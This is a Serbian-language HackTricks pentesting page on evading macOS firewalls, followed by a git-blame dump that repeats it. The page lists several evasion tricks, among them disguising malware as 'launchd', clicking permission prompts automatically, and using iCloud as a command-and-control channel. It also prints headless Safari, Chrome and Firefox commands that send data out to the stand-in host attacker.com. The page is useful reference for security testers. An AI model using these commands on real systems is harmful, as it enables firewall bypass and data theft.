hacktricks/macos-hardening/macos-security-and-privilege-escalation/macos-bypassing-firewalls.md

# Bypassovanje macOS Firewall-a

<details>

<summary><strong>Naučite hakovanje AWS-a od nule do heroja sa</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>

Drugi načini podrške HackTricks-u:

* Ako želite da vidite svoju **kompaniju reklamiranu na HackTricks-u** ili da **preuzmete HackTricks u PDF formatu** proverite [**PLANOVE ZA PRIJAVU**](https://github.com/sponsors/carlospolop)!
* Nabavite [**zvanični PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Otkrijte [**Porodicu PEASS**](https://opensea.io/collection/the-peass-family), našu kolekciju ekskluzivnih [**NFT-ova**](https://opensea.io/collection/the-peass-family)
* **Pridružite se** 💬 [**Discord grupi**](https://discord.gg/hRep4RUj7f) ili [**telegram grupi**](https://t.me/peass) ili nas **pratite** na **Twitteru** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **Podelite svoje hakovanje trikove slanjem PR-ova na** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repozitorijume.

</details>

## Pronađene tehnike

Navedene tehnike su pronađene da funkcionišu u nekim macOS firewall aplikacijama.

### Zloupotreba imena na whitelisti

* Na primer, nazivanje malvera imenima poznatih macOS procesa poput **`launchd`**

### Sintetički Klik

* Ako firewall zatraži dozvolu od korisnika, naterajte malver da **klikne na dozvolu**

### **Korišćenje Apple potpisanih binarnih fajlova**

* Poput **`curl`**, ali i drugih poput **`whois`**

### Dobro poznati Apple domeni

Firewall može dozvoljavati konekcije ka dobro poznatim Apple domenima poput **`apple.com`** ili **`icloud.com`**. iCloud bi mogao biti korišćen kao C2.

### Generički Bypass

Neke ideje za pokušaj zaobilaženja firewall-a

### Provera dozvoljenog saobraćaja

Znanje o dozvoljenom saobraćaju će vam pomoći da identifikujete potencijalno belistane domene ili koje aplikacije imaju dozvolu da im pristupe
```bash
lsof -i TCP -sTCP:ESTABLISHED
```
### Zloupotreba DNS-a

DNS rezolucije se vrše putem **`mdnsreponder`** potpisane aplikacije koja će verovatno biti dozvoljena da kontaktira DNS servere.

<figure><img src="../../.gitbook/assets/image (464).png" alt="https://www.youtube.com/watch?v=UlT5KFTMn2k"><figcaption></figcaption></figure>

### Putem aplikacija pregledača

* **oascript**
```applescript
tell application "Safari"
run
tell application "Finder" to set visible of process "Safari" to false
make new document
set the URL of document 1 to "https://attacker.com?data=data%20to%20exfil
end tell
```
* Google Chrome

{% code overflow="wrap" %}
```bash
"Google Chrome" --crash-dumps-dir=/tmp --headless "https://attacker.com?data=data%20to%20exfil"
```
{% endcode %}

* Firefox
```bash
firefox-bin --headless "https://attacker.com?data=data%20to%20exfil"
```
* Safari
```bash
open -j -a Safari "https://attacker.com?data=data%20to%20exfil"
```
### Putem ubacivanja procesa

Ako možete **ubaciti kod u proces** koji je dozvoljen da se poveže sa bilo kojim serverom, možete zaobići zaštitu firewall-a:

{% content-ref url="macos-proces-abuse/" %}
[macos-proces-abuse](macos-proces-abuse/)
{% endcontent-ref %}

## Reference

* [https://www.youtube.com/watch?v=UlT5KFTMn2k](https://www.youtube.com/watch?v=UlT5KFTMn2k)

<details>

<summary><strong>Naučite hakovanje AWS-a od nule do heroja sa</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>

Drugi načini podrške HackTricks-u:

* Ako želite da vidite svoju **kompaniju reklamiranu na HackTricks-u** ili da **preuzmete HackTricks u PDF formatu** proverite [**PLANOVE ZA PRETPLATU**](https://github.com/sponsors/carlospolop)!
* Nabavite [**zvanični PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Otkrijte [**The PEASS Family**](https://opensea.io/collection/the-peass-family), našu kolekciju ekskluzivnih [**NFT-ova**](https://opensea.io/collection/the-peass-family)
* **Pridružite se** 💬 [**Discord grupi**](https://discord.gg/hRep4RUj7f) ili [**telegram grupi**](https://t.me/peass) ili nas **pratite** na **Twitter-u** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **Podelite svoje hakovanje trikove slanjem PR-ova na** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repozitorijume.

</details>
Translated ['README.md', 'binary-exploitation/arbitrary-write-2-exec/REA 2024-04-07 04:23:52 +00:00			`# Bypassovanje macOS Firewall-a`
GITBOOK-3971: change request with no subject merged in GitBook 2023-06-08 16:46:11 +00:00
			`<details>`

Translated to Serbian 2024-02-10 13:11:20 +00:00			`<summary><strong>Naučite hakovanje AWS-a od nule do heroja sa</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>`
GITBOOK-3971: change request with no subject merged in GitBook 2023-06-08 16:46:11 +00:00
Translated to Serbian 2024-02-10 13:11:20 +00:00			`Drugi načini podrške HackTricks-u:`
arte 2023-12-30 20:49:49 +00:00
Translated ['README.md', 'binary-exploitation/arbitrary-write-2-exec/REA 2024-04-07 04:23:52 +00:00			`* Ako želite da vidite svoju kompaniju reklamiranu na HackTricks-u ili da preuzmete HackTricks u PDF formatu proverite [PLANOVE ZA PRIJAVU](https://github.com/sponsors/carlospolop)!`
Translated to Serbian 2024-02-10 13:11:20 +00:00			`* Nabavite [zvanični PEASS & HackTricks swag](https://peass.creator-spring.com)`
Translated ['README.md', 'binary-exploitation/arbitrary-write-2-exec/REA 2024-04-07 04:23:52 +00:00			`* Otkrijte [Porodicu PEASS](https://opensea.io/collection/the-peass-family), našu kolekciju ekskluzivnih [NFT-ova](https://opensea.io/collection/the-peass-family)`
			`* Pridružite se 💬 [Discord grupi](https://discord.gg/hRep4RUj7f) ili [telegram grupi](https://t.me/peass) ili nas pratite na Twitteru 🐦 [@carlospolopm](https://twitter.com/hacktricks\_live).`
Translated to Serbian 2024-02-10 13:11:20 +00:00			`* Podelite svoje hakovanje trikove slanjem PR-ova na [HackTricks](https://github.com/carlospolop/hacktricks) i [HackTricks Cloud](https://github.com/carlospolop/hacktricks-cloud) github repozitorijume.`
GITBOOK-3971: change request with no subject merged in GitBook 2023-06-08 16:46:11 +00:00
			`</details>`

Translated to Serbian 2024-02-10 13:11:20 +00:00			`## Pronađene tehnike`
GITBOOK-3971: change request with no subject merged in GitBook 2023-06-08 16:46:11 +00:00
Translated ['README.md', 'binary-exploitation/arbitrary-write-2-exec/REA 2024-04-07 04:23:52 +00:00			`Navedene tehnike su pronađene da funkcionišu u nekim macOS firewall aplikacijama.`
GITBOOK-3971: change request with no subject merged in GitBook 2023-06-08 16:46:11 +00:00
Translated ['README.md', 'binary-exploitation/arbitrary-write-2-exec/REA 2024-04-07 04:23:52 +00:00			`### Zloupotreba imena na whitelisti`
GITBOOK-3971: change request with no subject merged in GitBook 2023-06-08 16:46:11 +00:00
Translated ['README.md', 'binary-exploitation/arbitrary-write-2-exec/REA 2024-04-07 04:23:52 +00:00			* Na primer, nazivanje malvera imenima poznatih macOS procesa poput `launchd`
GITBOOK-3971: change request with no subject merged in GitBook 2023-06-08 16:46:11 +00:00
Translated ['README.md', 'binary-exploitation/arbitrary-write-2-exec/REA 2024-04-07 04:23:52 +00:00			`### Sintetički Klik`
GITBOOK-3971: change request with no subject merged in GitBook 2023-06-08 16:46:11 +00:00
Translated ['README.md', 'binary-exploitation/arbitrary-write-2-exec/REA 2024-04-07 04:23:52 +00:00			`* Ako firewall zatraži dozvolu od korisnika, naterajte malver da klikne na dozvolu`
GITBOOK-3971: change request with no subject merged in GitBook 2023-06-08 16:46:11 +00:00
Translated to Serbian 2024-02-10 13:11:20 +00:00			`### Korišćenje Apple potpisanih binarnih fajlova`
GITBOOK-3971: change request with no subject merged in GitBook 2023-06-08 16:46:11 +00:00
Translated ['README.md', 'binary-exploitation/arbitrary-write-2-exec/REA 2024-04-07 04:23:52 +00:00			* Poput `curl`, ali i drugih poput `whois`
GITBOOK-3971: change request with no subject merged in GitBook 2023-06-08 16:46:11 +00:00
Translated to Serbian 2024-02-10 13:11:20 +00:00			`### Dobro poznati Apple domeni`
GITBOOK-3971: change request with no subject merged in GitBook 2023-06-08 16:46:11 +00:00
Translated ['README.md', 'binary-exploitation/arbitrary-write-2-exec/REA 2024-04-07 04:23:52 +00:00			Firewall može dozvoljavati konekcije ka dobro poznatim Apple domenima poput `apple.com` ili `icloud.com`. iCloud bi mogao biti korišćen kao C2.
GITBOOK-3971: change request with no subject merged in GitBook 2023-06-08 16:46:11 +00:00
Translated to Serbian 2024-02-10 13:11:20 +00:00			`### Generički Bypass`
GITBOOK-3971: change request with no subject merged in GitBook 2023-06-08 16:46:11 +00:00
Translated ['README.md', 'binary-exploitation/arbitrary-write-2-exec/REA 2024-04-07 04:23:52 +00:00			`Neke ideje za pokušaj zaobilaženja firewall-a`
GITBOOK-3971: change request with no subject merged in GitBook 2023-06-08 16:46:11 +00:00
Translated to Serbian 2024-02-10 13:11:20 +00:00			`### Provera dozvoljenog saobraćaja`
GITBOOK-3971: change request with no subject merged in GitBook 2023-06-08 16:46:11 +00:00
Translated ['README.md', 'binary-exploitation/arbitrary-write-2-exec/REA 2024-04-07 04:23:52 +00:00			`Znanje o dozvoljenom saobraćaju će vam pomoći da identifikujete potencijalno belistane domene ili koje aplikacije imaju dozvolu da im pristupe`
GITBOOK-3971: change request with no subject merged in GitBook 2023-06-08 16:46:11 +00:00			```bash
			`lsof -i TCP -sTCP:ESTABLISHED`
			```
Translated to Serbian 2024-02-10 13:11:20 +00:00			`### Zloupotreba DNS-a`
GITBOOK-3971: change request with no subject merged in GitBook 2023-06-08 16:46:11 +00:00
Translated ['README.md', 'binary-exploitation/arbitrary-write-2-exec/REA 2024-04-07 04:23:52 +00:00			DNS rezolucije se vrše putem `mdnsreponder` potpisane aplikacije koja će verovatno biti dozvoljena da kontaktira DNS servere.
GITBOOK-3971: change request with no subject merged in GitBook 2023-06-08 16:46:11 +00:00
Translated ['README.md', 'binary-exploitation/arbitrary-write-2-exec/REA 2024-04-07 04:23:52 +00:00			`<figure><img src="../../.gitbook/assets/image (464).png" alt="https://www.youtube.com/watch?v=UlT5KFTMn2k"><figcaption></figcaption></figure>`
GITBOOK-3971: change request with no subject merged in GitBook 2023-06-08 16:46:11 +00:00
Translated to Serbian 2024-02-10 13:11:20 +00:00			`### Putem aplikacija pregledača`
GITBOOK-3971: change request with no subject merged in GitBook 2023-06-08 16:46:11 +00:00
			`* oascript`
			```applescript
			`tell application "Safari"`
Translated to Serbian 2024-02-10 13:11:20 +00:00			`run`
			`tell application "Finder" to set visible of process "Safari" to false`
			`make new document`
			`set the URL of document 1 to "https://attacker.com?data=data%20to%20exfil`
GITBOOK-3971: change request with no subject merged in GitBook 2023-06-08 16:46:11 +00:00			`end tell`
			```
			`* Google Chrome`

			`{% code overflow="wrap" %}`
			```bash
			`"Google Chrome" --crash-dumps-dir=/tmp --headless "https://attacker.com?data=data%20to%20exfil"`
			```
			`{% endcode %}`

			`* Firefox`
			```bash
			`firefox-bin --headless "https://attacker.com?data=data%20to%20exfil"`
			```
			`* Safari`
			```bash
			`open -j -a Safari "https://attacker.com?data=data%20to%20exfil"`
			```
Translated ['README.md', 'binary-exploitation/arbitrary-write-2-exec/REA 2024-04-07 04:23:52 +00:00			`### Putem ubacivanja procesa`
GITBOOK-3971: change request with no subject merged in GitBook 2023-06-08 16:46:11 +00:00
Translated ['README.md', 'binary-exploitation/arbitrary-write-2-exec/REA 2024-04-07 04:23:52 +00:00			`Ako možete ubaciti kod u proces koji je dozvoljen da se poveže sa bilo kojim serverom, možete zaobići zaštitu firewall-a:`
GITBOOK-3971: change request with no subject merged in GitBook 2023-06-08 16:46:11 +00:00
			`{% content-ref url="macos-proces-abuse/" %}`
			`[macos-proces-abuse](macos-proces-abuse/)`
			`{% endcontent-ref %}`

Translated to Serbian 2024-02-10 13:11:20 +00:00			`## Reference`
GITBOOK-3971: change request with no subject merged in GitBook 2023-06-08 16:46:11 +00:00
			`* [https://www.youtube.com/watch?v=UlT5KFTMn2k](https://www.youtube.com/watch?v=UlT5KFTMn2k)`

			`<details>`

Translated to Serbian 2024-02-10 13:11:20 +00:00			`<summary><strong>Naučite hakovanje AWS-a od nule do heroja sa</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>`
GITBOOK-3971: change request with no subject merged in GitBook 2023-06-08 16:46:11 +00:00
Translated to Serbian 2024-02-10 13:11:20 +00:00			`Drugi načini podrške HackTricks-u:`
arte 2023-12-30 20:49:49 +00:00
Translated ['README.md', 'binary-exploitation/arbitrary-write-2-exec/REA 2024-04-07 04:23:52 +00:00			`* Ako želite da vidite svoju kompaniju reklamiranu na HackTricks-u ili da preuzmete HackTricks u PDF formatu proverite [PLANOVE ZA PRETPLATU](https://github.com/sponsors/carlospolop)!`
Translated to Serbian 2024-02-10 13:11:20 +00:00			`* Nabavite [zvanični PEASS & HackTricks swag](https://peass.creator-spring.com)`
			`* Otkrijte [The PEASS Family](https://opensea.io/collection/the-peass-family), našu kolekciju ekskluzivnih [NFT-ova](https://opensea.io/collection/the-peass-family)`
Translated ['README.md', 'binary-exploitation/arbitrary-write-2-exec/REA 2024-04-07 04:23:52 +00:00			`* Pridružite se 💬 [Discord grupi](https://discord.gg/hRep4RUj7f) ili [telegram grupi](https://t.me/peass) ili nas pratite na Twitter-u 🐦 [@carlospolopm](https://twitter.com/hacktricks\_live).`
Translated to Serbian 2024-02-10 13:11:20 +00:00			`* Podelite svoje hakovanje trikove slanjem PR-ova na [HackTricks](https://github.com/carlospolop/hacktricks) i [HackTricks Cloud](https://github.com/carlospolop/hacktricks-cloud) github repozitorijume.`
GITBOOK-3971: change request with no subject merged in GitBook 2023-06-08 16:46:11 +00:00
			`</details>`